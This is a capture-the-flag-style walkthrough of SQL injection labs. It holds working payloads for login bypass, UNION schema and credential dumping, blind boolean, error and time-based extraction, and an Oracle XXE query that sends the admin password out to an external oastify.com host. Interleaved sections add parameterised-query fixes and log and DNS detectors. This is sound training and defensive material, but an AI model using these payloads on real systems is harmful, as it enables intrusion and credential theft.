SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
Task
Going over to the webpage and clicking on Gifts
You should get this,
Now, let's capture this request in Burp Suite
Sending the request over to Burp Repeater,
To display one or more unreleased products, we can use the payload ' or 1=1--
Make sure this is URL encoded, to something like '+or+1%3d1--
Adding this payload to the URL,
Cool, the status code is "OK". Viewing the response in our browser
Nice, we have successfully solved the lab.
SQL injection vulnerability allowing login bypass
Task
Navigating to the webpage and clicking on "My Account"
You should get this,
So we are asked to log in as the administrator user. To do this we can use the following credentials:
username: administrator'--
password: aaaaaaa
Note: We can either provide a blank password or use any random string for the password, since the password check gets commented out anyway
Cool, we have successfully solved the lab
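As an added illustration (not part of the original write-up), the two labs above reduced to a few lines of Python against an in-memory SQLite database: a category filter and a login check built by string concatenation, next to the same queries written with bound parameters. Table names, rows and passwords are constructed sample data, and the function names are my own; the point is to see exactly what ' or 1=1-- and administrator'-- do to the SQL text, and that the parameterised versions treat the same input as a literal value that matches nothing.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's catalogue and users tables
# (sample data, not the lab's real rows; plaintext passwords only to keep
# the demo small, a real application stores password hashes).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1),
                                    ('Unreleased Gadget', 'Gifts', 0),
                                    ('Lamp', 'Lifestyle', 1);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'admin-pw-placeholder'),
                                 ('carlos', 'carlos-pw-placeholder');
    """)
    return con

def products_vulnerable(con, category):
    # The category value is pasted into the SQL text, so a quote in it ends
    # the string literal and everything after it is parsed as SQL. With
    # "' or 1=1--" the released = 1 check is commented out.
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return sorted(r[0] for r in con.execute(sql))

def products_safe(con, category):
    # Parameterised: the driver sends the value separately from the SQL text,
    # so quotes and comment markers in it never reach the parser as SQL.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return sorted(r[0] for r in con.execute(sql, (category,)))

def login_vulnerable(con, username, password):
    # "administrator'--" closes the username literal and comments out the
    # password comparison, so the row is returned whatever the password is.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(con, username, password):
    # Same query with bound parameters: "administrator'--" is looked up as a
    # literal username, which does not exist.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    con = make_db()
    print(products_vulnerable(con, "' or 1=1--"))   # the unreleased product leaks
    print(products_safe(con, "' or 1=1--"))         # empty: no such category
    print(login_vulnerable(con, "administrator'--", "aaaaaaa"))
    print(login_safe(con, "administrator'--", "aaaaaaa"))
```

The fix is the same in both cases: never build the WHERE clause from request data; bind it. Input filtering on quotes is not a substitute, as the later labs on encoding and filter bypass show.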
SQL injection attack, querying the database type and version on Oracle
Task
Navigating to the webpage
Capturing the request in Burp Suite,
The first thing to do is to confirm the number of columns returned by the query
So, we'll be using the queries
' order by 1--
' order by 2--
' order by 3--
Ensure these are URL encoded. When you get an Internal Server Error, it means that column number isn't available
This means there is a first column available,
Trying the other queries
This makes it 2 columns available,
From the above screenshot you'll see that the query ' order by 3-- returned an Internal Server Error, which means there isn't a third column available.
So, we have 2 columns available.
To query the database version we can use the following query
' UNION SELECT banner,null FROM v$version--
Explaining this:
The banner column contains the information about the database version
The null is just there to fill in the second column of the result
v$version is the name of a database table
Trying the query
Let's show the response in our browser
Nice, we have successfully solved the lab
SQL injection attack, querying the database type and version on MySQL and Microsoft
Task
Navigating to the webpage, clicking on "Gifts"
Capturing this request in Burp Suite and sending it over to Burp Intruder
Now, let's check the number of columns returned by the query using the queries
' order by 1-- -
' order by 2-- -
' order by 3-- -
Ensure these are URL encoded. When you get an Internal Server Error, it means that column number isn't available
This means we have a first column available.
Moving on,
This means we have 2 columns available.
Moving on,
From the above screenshot you'll see that the query ' order by 3-- - returned an Internal Server Error, which means there isn't a third column available.
Now, to display the database version string, we can use the query
' UNION SELECT version(),null-- -
Using this query
Now, let's show this response in our browser
Nice, we have successfully completed the task for this lab
SQL injection attack, listing the database contents on non-Oracle databases
Task
Navigate to the webpage and click on "Gift"
Capturing the request in Burp Suite and sending it over to Burp Repeater
First, let's check the number of columns returned by the query.
We can do that using the queries
' order by 1--
' order by 2--
' order by 3--
Ensure you URL encode the queries before using them
Now, this means we have a first column available.
Moving on,
We have 2 columns available.
Moving on,
We got an Internal Server Error here, which means there isn't a third column available.
Hence, we have 2 columns available.
Let's try to get the version the database is running; we can use the query
' UNION SELECT version(),null--
Now, let's check the names of the tables in the database. We can use the query
' UNION SELECT table_name,null FROM information_schema.tables--
Applying this query
We found a table users_vqdnay.
The next thing to do is to check the names of the columns in that table; we can use the query
' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='users_vqdnay'--
Applying this query
We got the columns username_dgcaur and password_eygubt.
Cool, let's dump the contents of the columns using the query
' UNION SELECT username_dgcaur,password_eygubt FROM users_vqdnay--
Applying this query
We got the credentials for the administrator user
username: administrator
password: 7ocf0wre9y16c1llsdp1
Let's go ahead and log in
Nice, we have successfully completed the task for this lab.
SQL injection attack, listing the database contents on Oracle
Task
Navigate to the webpage and click on "Gifts"
Capturing this request in Burp Suite and sending it over to Burp Repeater,
Let's start out by checking the number of columns returned by the query. We can use the queries
' order by 1--
' order by 2--
' order by 3--
Ensure the queries are URL encoded before applying them
This means we have a first column available
Moving on,
Now, this means we have 2 columns available
Moving on,
The "Internal Server Error" means that there isn't a third column available.
Let's check the version the database is running using the query
' UNION SELECT banner,null FROM v$version--
Applying this query
Cool, we were able to get the version the database is running.
To get the names of the tables in the database, we can use the query
' UNION SELECT table_name,null FROM all_tables--
Applying this query
We found the table name USERS_DHHSSL
The next thing to do is to check the names of the columns available in that table. We can do that using the query
' UNION SELECT column_name,null FROM all_tab_columns WHERE table_name='USERS_DHHSSL'--
Applying this query
We got the column names USERNAME_ZTMDCJ and PASSWORD_QGFLBW.
Now, let's go ahead and dump the contents of the columns using the query
' UNION SELECT USERNAME_ZTMDCJ,PASSWORD_QGFLBW FROM USERS_DHHSSL--
Applying this query
We got the creds for the administrator user
username: administrator
password: 8aqefrxiudrdaqkhk3qf
Let's go ahead and log in as the administrator user
Cool stuff, we have successfully completed the task for this lab.
SQL injection UNION attack, determining the number of columns returned by the query
Task
Navigate to the webpage and click on "Gifts"
Capturing this request in Burp Suite and sending it over to Burp Repeater,
We can use a UNION attack to determine the number of columns returned by the query. We can use the queries
' UNION SELECT null--
' UNION SELECT null,null--
' UNION SELECT null,null,null--
' UNION SELECT null,null,null,null--
So, we'll keep adding nulls like that until we get an HTTP response code 200 OK.
Note: You stop when you get HTTP response code 200 OK
URL encode the queries before applying them
This means there's more than one column in the query result, hence why we are getting the "Internal Server Error"
We got the error again, which means there are more than two columns
Moving on,
We got the HTTP response code 200 OK, which means there are 3 columns in the query result.
Showing the response in our browser
We have successfully completed the task for this lab
SQL injection UNION attack, finding a column containing text
Task
Navigate to the webpage and click on "Lifestyle"
Capturing this request in Burp Suite and sending it over to Burp Repeater
First, let's determine the number of columns returned by the query using the queries
' order by 1--
' order by 2--
' order by 3--
' order by 4--
Ensure you URL encode the queries when you use them.
This means we have a first column available.
Moving on,
Alright, so we have 2 columns available.
Moving on,
So, there are 3 columns available.
Moving on,
We got an "Internal Server Error", meaning there isn't a fourth column
Hence, we have 3 columns available.
So, the task is to check which of the columns is compatible with string data. We are asked to return the string yuJfMW.
Now, let's start by using the UNION method to confirm the number of columns. We can use the query
' UNION SELECT null,null,null--
If we don't get the "Internal Server Error", it means there truly are 3 columns available.
Applying the query
Cool, now let's look for the vulnerable column, that is, the column that is compatible with string data. We can try the following queries
' UNION SELECT 'yuJfMW',null,null--
' UNION SELECT null,'yuJfMW',null--
' UNION SELECT null,null,'yuJfMW'--
So, a query not returning the "Internal Server Error" means the column where the string is positioned is the one that accepts string data.
Applying the queries,
From the above screenshots, you'll see that only the query ' UNION SELECT null,'yuJfMW',null-- was able to retrieve the string from the database.
Let's try to show the response in our browser
Cool, we have successfully solved the lab. So, it is safe to say the second column is compatible with string data.
SQL injection UNION attack, retrieving data from other tables
Task
Navigate to the webpage and click on "Lifestyle"
Capturing this request in Burp Suite and sending it over to Burp Repeater,
Now, this should be an easy one, since we were already given the name of the table, users, and the columns in that table, username and password. So, what we'll try to do is just determine the number of columns returned by the query. We'll be using the queries
' order by 1--
' order by 2--
' order by 3--
Applying the queries
We have a first column available
Moving on,
Alright, so 2 columns are available
Moving on,
The "Internal Server Error" displayed tells us that there isn't a third column.
So, we have 2 columns available
Now, let's go ahead and dump the contents of the columns username and password in the table users. We can use this query
' UNION SELECT username,password FROM users--
Applying this query
Cool, we got the creds for the administrator user
username: administrator
password: nqic8fkyvzqjfez72khh
Let's try to log in with these creds
Cool, we have successfully completed the task for this lab
SQL injection UNION attack, retrieving multiple values in a single column
Task
Navigate to the website and click on "Lifestyle"
Capturing the request in Burp Suite and sending it over to Burp Repeater,
Let's go ahead and check the number of columns returned by the query; we can use the queries
' order by 1--
' order by 2--
' order by 3--
Using these queries
From the above screenshot, it is obvious that we have just 2 columns available.
Let's go ahead and look for the vulnerable column, that is, the column that is compatible with string data. To do that we can use the queries
' UNION SELECT 'abeg',null--
' UNION SELECT null,'abeg'--
URL encode the queries before using them
It is evident that the second column is the one compatible with string data.
Now, let's go ahead and dump the contents of the columns username and password in the table users, concatenated into that single string column. We can use this query
' UNION SELECT null,username || '~' || password FROM users--
Applying the query
Cool, we got the creds for the administrator user.
username: administrator
password: 6tp172ew9j1sy5f7vx3d
Let's try to log in with the creds we found
Cool, we have successfully solved this lab.
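From the defender's side, the UNION labs above leave a very recognisable trail in the web server's access log: a quote followed by ORDER BY n, then UNION SELECT null,... with a growing number of nulls, then a UNION SELECT that names real columns. The following is an added example (my own code, not from the write-up or from PortSwigger) that URL-decodes each query-string parameter of some constructed combined-format log lines and flags those patterns, grouping hits by client address so a single source that walks the whole sequence stands out. The log lines, rule names and field layout are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined-log style), not real traffic. They
# mirror the probing sequence used in the labs: a tautology, ORDER BY column
# counting, a UNION SELECT null probe, then a UNION SELECT that pulls data.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /filter?category=Gifts HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /filter?category=Gifts%27+or+1%3d1-- HTTP/1.1" 200 9870
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /filter?category=Gifts%27+order+by+3-- HTTP/1.1" 500 112
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /filter?category=Gifts%27+UNION+SELECT+null%2cnull-- HTTP/1.1" 200 5200
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /filter?category=Gifts%27+UNION+SELECT+username%2cpassword+FROM+users-- HTTP/1.1" 200 6100
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /product?productId=3 HTTP/1.1" 200 4000
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3})'
)

# Each rule is applied to the *decoded* parameter value, so %27 / + / %3d
# encoding (which the write-up applies to every payload) does not hide it.
RULES = [
    ("tautology", re.compile(r"'\s*(?:or|and)\s*'?\d+'?\s*=\s*'?\d+", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enumeration", re.compile(r"information_schema\.|all_tables|all_tab_columns|v\$version", re.I)),
    ("time-delay", re.compile(r"pg_sleep|\bsleep\(|waitfor\s+delay|dbms_pipe\.receive_message", re.I)),
]

def decoded_params(target):
    """Split the request target into (name, value) pairs with percent/plus decoding."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)

def scan(log_text):
    """Return one finding per (line, parameter, rule) match."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for name, value in decoded_params(m["target"]):
            for rule, pattern in RULES:
                if pattern.search(value):
                    findings.append({"line": lineno, "ip": m["ip"], "param": name,
                                     "rule": rule, "status": int(m["status"])})
    return findings

def summarize(findings):
    """Distinct rules seen per client; several distinct rules from one IP is the
    column-counting-then-extraction pattern rather than a one-off false positive."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).add(f["rule"])
    return {ip: sorted(rules) for ip, rules in by_ip.items()}

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
    print(summarize(scan(SAMPLE_LOG)))
```

The 500 responses in the sample are a useful secondary signal on their own: an application that answers ORDER BY 3 with an internal server error is telling the attacker (and you) that user input reached the SQL parser.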
Blind SQL injection with conditional responses
Task
So, the application uses a tracking cookie for analytics
Navigate to the webpage
Click "View details", then capture the request in Burp Suite
Now, let's use conditional responses to check if it is vulnerable to blind SQLi. We can use the queries
' AND '1'='1
' AND '1'='2
Ensure they are URL encoded when using them
From the above screenshot we got the "Welcome back!" message; this is because the condition '1'='1 is always true.
Trying the second query
So, this didn't return the "Welcome back!" message; this is because the condition '1'='2 is always false.
Now that we have confirmed that it is vulnerable, let's go ahead to obtain the password, since we know the table name to be users, the names of the columns in the table to be username and password, and the username to be administrator.
Based on the hint we were provided, I think we now know what to focus on
To achieve this, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's
Alright so, we'll be trying the letters all the way from a-z, and we'll also try the numbers 0-9, until we get a "Welcome back!" message
Trying this query, you should get the first character of the password
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 'p
Cool, now that we got the first character, let's go ahead and query for the second character. We can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 2, 1) = 'q
Getting the 3rd character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 3, 1) = 'l
Getting the 4th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 4, 1) = '8
Getting the 5th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 5, 1) = 'z
Getting the 6th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 6, 1) = 's
Getting the 7th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 7, 1) = 'm
Getting the 8th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 8, 1) = 'j
Getting the 9th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 9, 1) = 'x
Getting the 10th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 10, 1) = 'r
Getting the 11th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 11, 1) = '7
Getting the 12th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 12, 1) = 'b
Getting the 13th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 13, 1) = 'i
Getting the 14th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 14, 1) = 'i
Getting the 15th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 15, 1) = 'y
Getting the 16th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 16, 1) = 'l
Getting the 17th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 17, 1) = 'u
Getting the 18th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 18, 1) = 'q
Getting the 19th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 19, 1) = 't
Getting the 20th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 20, 1) = 'j
So we got the final password to be pql8zsmjxr7biiyluqtj. Let's try to log in as the administrator user
Nice, we have successfully solved this lab
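To make the mechanism above concrete from the application's point of view, here is an added example (my own, not from the write-up) of the tracking-cookie lookup in two forms against an in-memory SQLite database. The vulnerable form never shows any data from the query, yet the true/false "Welcome back!" decision is a one-bit oracle, and the same ' AND '1'='1 / ' AND '1'='2 pair and a one-character SUBSTRING probe distinguish rows just as in the lab. The parameterised form gives the same answer to every injected cookie. The table names, the placeholder password and the function names are assumptions; SQLite spells the lab's SUBSTRING as substr.

```python
import sqlite3

# Constructed tracking table and a users table with a placeholder password
# (sample data, not the lab's).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE tracking(id TEXT);
        INSERT INTO tracking VALUES ('abc123');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'sample-placeholder-pw');
    """)
    return con

def welcome_back_vulnerable(con, tracking_id):
    # True means the page would render "Welcome back!". No column value is
    # ever shown, but whether a row matched leaks one bit per request, and the
    # injected condition decides that bit.
    sql = f"SELECT id FROM tracking WHERE id = '{tracking_id}'"
    return con.execute(sql).fetchone() is not None

def welcome_back_safe(con, tracking_id):
    # Parameterised lookup: an injected condition is just part of a cookie
    # value that matches no row, so true and false probes look identical.
    sql = "SELECT id FROM tracking WHERE id = ?"
    return con.execute(sql, (tracking_id,)).fetchone() is not None

# The probes from the lab, with a known-good cookie value in front of them.
TRUE_PROBE = "abc123' AND '1'='1"
FALSE_PROBE = "abc123' AND '1'='2"
FIRST_CHAR_PROBE = ("abc123' AND substr((SELECT password FROM users "
                    "WHERE username = 'administrator'), 1, 1) = '{}")

def oracle_answers(con, guess):
    """(vulnerable answer, safe answer) for one first-character guess."""
    cookie = FIRST_CHAR_PROBE.format(guess)
    return welcome_back_vulnerable(con, cookie), welcome_back_safe(con, cookie)

if __name__ == "__main__":
    con = make_db()
    print(welcome_back_vulnerable(con, TRUE_PROBE), welcome_back_vulnerable(con, FALSE_PROBE))
    print(oracle_answers(con, "s"), oracle_answers(con, "x"))
    print(welcome_back_safe(con, TRUE_PROBE), welcome_back_safe(con, FALSE_PROBE))
```

Two defensive takeaways follow from this: the cookie has to be bound as a parameter (or the lookup dropped altogether, since an analytics identifier does not need a database round trip on every page), and a log of one client sending hundreds of requests whose cookie differs only in the last character is the monitoring signal for this class of attack.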
Blind SQL injection with conditional errors
Task
Navigate to the webpage and click on "View details"
Capturing the request in Burp Suite and sending it over to Burp Repeater
Now, let's start by testing conditions.
From the hint provided we can see that this lab uses an Oracle database
So, using these queries we should be able to test the conditions
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM dual)||'
'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE NULL END FROM dual)||'
Ensure you URL encode these before using them
We got the "Internal Server Error"; this is because 1=1 is always true
Trying the second query
This query didn't throw an error because the condition 1=2 is not true
Now, to check if there really exists a user administrator, we can use the query
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
If this returns an error, it means the user exists in the database
Cool, the user is available in the database.
Let's go ahead and check the length of the password stored in the database; we can use the query
'||(SELECT CASE WHEN LENGTH(password)>1 THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
So, we are going to keep changing the number 1 until we stop getting an error
From the above screenshot it is evident that the password length is greater than one. Trying this manually;
From the above screenshot, we can easily tell that the length of the password is 20.
Now, let's go ahead and extract the password. We can use this query
'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
We can see it didn't return an error; this means a isn't the first character of the password.
Let's use Burp Intruder to brute-force this instead of testing it one by one.
Send the request from Burp Repeater to Burp Intruder, highlight the a and click on "Add", and leave the attack type as Sniper. After doing all this, you should have something like this
Now, click on Payloads. You should get this
Editing this,
We'll assume that the password contains only lowercase alphanumeric characters. So, we'll add the payloads in the range a-z and 0-9
Click on "Start attack"
We got our first character
Getting the 2nd character, we can use the query
'||(SELECT CASE WHEN SUBSTR(password,2,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using Burp Intruder
Starting the attack
We got the 2nd character
Getting the 3rd character, we can use the query
'||(SELECT CASE WHEN SUBSTR(password,3,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using Burp Intruder
Starting the attack
We got the 3rd character
Getting the 4th character, we can use the query
'||(SELECT CASE WHEN SUBSTR(password,4,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using Burp Intruder
Starting the attack
We got the 4th character
Getting the 5th character, we can use the query
'||(SELECT CASE WHEN SUBSTR(password,5,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using Burp Intruder
Starting the attack
We got the 5th character
We can continue this process until we get to the 20th character (since we already know the password length to be 20). We can use the query
'||(SELECT CASE WHEN SUBSTR(password,20,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using Burp Intruder
Starting the attack
We got the 20th character.
So, I got the password to be b7dj6cx48d5qx0yzg7ld. Let's use this password to log in as the administrator user
Cool stuff, we have completed the task for this lab.
Visible error-based SQL injection
Task
Navigate to the webpage and click on "View details"
Capturing the request in Burp Suite and sending it over to Burp Repeater
Let's try to trigger a SQL error using the ' symbol
You can see we got the error "Unterminated string literal". If you also observed, an extra ' character got added to the cookie section. So, let's try to comment that out using --
Cool, you can see we didn't get an error, so this means we've got the right query.
Now, let's try to use the CAST() function
' AND CAST((SELECT 1) AS int)--
Ensure this is URL encoded
From the error, we have to make the argument of AND a boolean. We can solve that using this query
' AND 1=CAST((SELECT 1) AS int)--
Applying this query
You can see we didn't get any error
Since we were told that there is a table called users with columns username and password, and that there is a username administrator, we can use this query to check for users
' AND 1=CAST((SELECT username FROM users) AS int)--
We get another error, so there seems to be a character limit here. To get around this, let's delete the value of the TrackingId cookie
We get another error, telling us that our query returned more than one row. Modifying the query to return just one row, we can use the query
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
Using this query
Cool, we got the first username in the users table to be administrator. Let's go ahead and leak the password hehe
This query will help us with that
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
Cool, we got the password of the administrator user to be zyxtiwdkhp96r63vsz5m.
Now, let's go ahead and log in as the administrator user
Nice, we have successfully solved this lab
Blind SQL injection with time delays
Task
Navigate to the webpage and click on "View details"
Capturing the request and sending it over to Burp Repeater
To trigger a 10-second delay, we can use the query
'|| pg_sleep(10)--
Ensure the query is URL encoded
Cool, we have successfully completed the task for this lab
Blind SQL injection with time delays and information retrieval
Task
Navigate to the webpage and click on "View details"
Capturing this request and sending it over to Burp Repeater
Let's start by triggering a 10s delay
'|| pg_sleep(10)--
Alright, cool, we were able to trigger a 10-second delay
We know the table name to be users, the column names to be username and password, and the name of the user to be administrator
But let's try to confirm if there really is a username administrator; we can use the query
';SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
Ensure the query is URL encoded
Now that we've confirmed that the username is present in the database, let's check the length of the password. We can use the query
';SELECT CASE WHEN (username='administrator' AND LENGTH(password)>1) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
This confirmed that the password length is greater than 1
This screenshot confirmed the length of the password to be 20
Now that we know the length of the password, let's start extracting the characters one by one. We'll be inviting Burp Intruder to the party. We can use the query
';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,1,1)='m') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
Let's assume the password characters to be lowercase alphanumeric characters.
Using the query
We didn't get the 10s delay, which means m isn't the first character of the password.
Trying the other characters,
I got the first character of the password to be 7
To get the second character, we can use the query
';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,2,1)='m') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
I got the second character of the password to be v
To get the third character of the password, you can use the query
';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,3,1)='m') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
I got the third character of the password to be 3.
This process can be continued until we get to the 20th password character
To get the 20th character, you can use the query
';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,20,1)='h') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
I got the last character of the password to be h.
I got the full password to be 7v3zmmujptl7r634bjlh. Now, let's go ahead and log in as the administrator user
Cool stuff, we have successfully solved this lab
Blind SQL injection with out-of-band interaction
Task
Navigate to the webpage and click on "View details"
Capturing the request in Burp Suite and sending it over to Burp Repeater
To trigger an out-of-band interaction with Burp Collaborator, we can use the query
' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual--
To get the payload from the Burp Collaborator client,
Now, let's paste this query using the payload we got from the Burp Collaborator client
' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://8cllzq3qnv0bxuz5k1o5wgeokfq6ev.oastify.com/"> %remote;]>'),'/l') FROM dual--
Ensure the query is URL encoded
Cool, we were able to achieve a DNS lookup.
Going back to our browser
We have successfully solved this lab.
Blind SQL injection with out-of-band data exfiltration
Task
Navigate to the webpage and click on "View details"
Capturing the request and sending it over to Burp Repeater
We'll be using the Burp Collaborator client for this task. Since we were given the table name to be users, the column names to be username and password, and the username to be administrator, all we need is the password of the admin user
' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.0tu71gj5zpi129crwrp9uf5rlir9fy.oastify.com/"> %remote;]>'),'/l') FROM dual--
Replace 0tu71gj5zpi129crwrp9uf5rlir9fy.oastify.com with the payload you got from your Burp Collaborator
Applying this query
Checking the Burp Collaborator client, click on "Poll now"; you should get this
Take a look at the domain name: the payload we got from the Burp Collaborator client was 0tu71gj5zpi129crwrp9uf5rlir9fy.oastify.com, but we got something different for the domain name
The password for the administrator user is the set of alphanumeric characters before the payload. So pfohk2cgqxm2ktuoer65 is the administrator password. Let's go ahead and log in as the administrator user
We have successfully solved the lab.
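The two out-of-band labs share one property a defender can use: the data leaves as a DNS query made by the database server itself, with the stolen value as the leading label of a name under an attacker-controlled domain. As an added example (my own code, not from the write-up or from PortSwigger), here is a small resolver-log check over constructed query-log lines that flags exactly that shape: queries from database hosts to anything outside an egress allowlist, queries under known OAST domains, and names whose first label looks like carried data. The host list, allowlist, log format and rule names are assumptions; the one flagged name reuses the Collaborator domain and the extracted value quoted in the write-up above.

```python
import re

# Constructed resolver log lines (BIND query-log style), not real traffic.
# 10.0.0.20 plays the database server; 10.0.0.77 is an ordinary workstation.
SAMPLE_DNS_LOG = """\
01-Jan-2024 10:00:01.000 client 10.0.0.20#53011: query: updates.internal.example IN A
01-Jan-2024 10:00:02.000 client 10.0.0.20#53012: query: pfohk2cgqxm2ktuoer65.0tu71gj5zpi129crwrp9uf5rlir9fy.oastify.com IN A
01-Jan-2024 10:00:03.000 client 10.0.0.77#40120: query: www.example.com IN A
"""

# Assumed environment knowledge: which resolver clients are database servers
# and which domains they are ever expected to look up.
DB_SERVERS = {"10.0.0.20"}
EGRESS_ALLOWLIST = {"internal.example"}
# Domains used by out-of-band testing services (Burp Collaborator uses both).
OAST_DOMAINS = {"oastify.com", "burpcollaborator.net"}

QUERY_RE = re.compile(r"client (?P<ip>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")

def base_domain(qname):
    """Registrable domain, approximated as the last two labels (enough for this demo)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])

def in_allowlist(qname):
    return any(qname == d or qname.endswith("." + d) for d in EGRESS_ALLOWLIST)

def analyze_query(ip, qname):
    """Return the list of reasons a single query is suspicious (empty if none)."""
    reasons = []
    if base_domain(qname) in OAST_DOMAINS:
        reasons.append("known-oast-domain")
    if ip in DB_SERVERS and not in_allowlist(qname):
        # A database server has no business resolving arbitrary external names.
        reasons.append("db-server-external-lookup")
    labels = qname.split(".")
    # Heuristic: a long, purely alphanumeric leading label on a deep name is
    # the shape of a value prepended to an attacker's domain.
    if len(labels) >= 4 and len(labels[0]) >= 16 and re.fullmatch(r"[a-z0-9]+", labels[0]):
        reasons.append("data-bearing-label")
    return reasons

def scan_dns(log_text):
    findings = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        reasons = analyze_query(m["ip"], m["qname"])
        if reasons:
            findings.append({"ip": m["ip"], "qname": m["qname"], "reasons": reasons,
                             "leading_label": m["qname"].split(".")[0]})
    return findings

if __name__ == "__main__":
    for f in scan_dns(SAMPLE_DNS_LOG):
        print(f)
```

The "leading_label" field is kept in the finding because, as the write-up shows, it is the exfiltrated value itself; an incident responder wants to know what left, not just that something did. The stronger control is to stop the query reaching the resolver at all: database servers should have no outbound DNS or HTTP path except to named internal services, and the Oracle XML external-entity feature used here should be disabled where it is not needed.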
SQL injection with filter bypass via XML encoding
Task
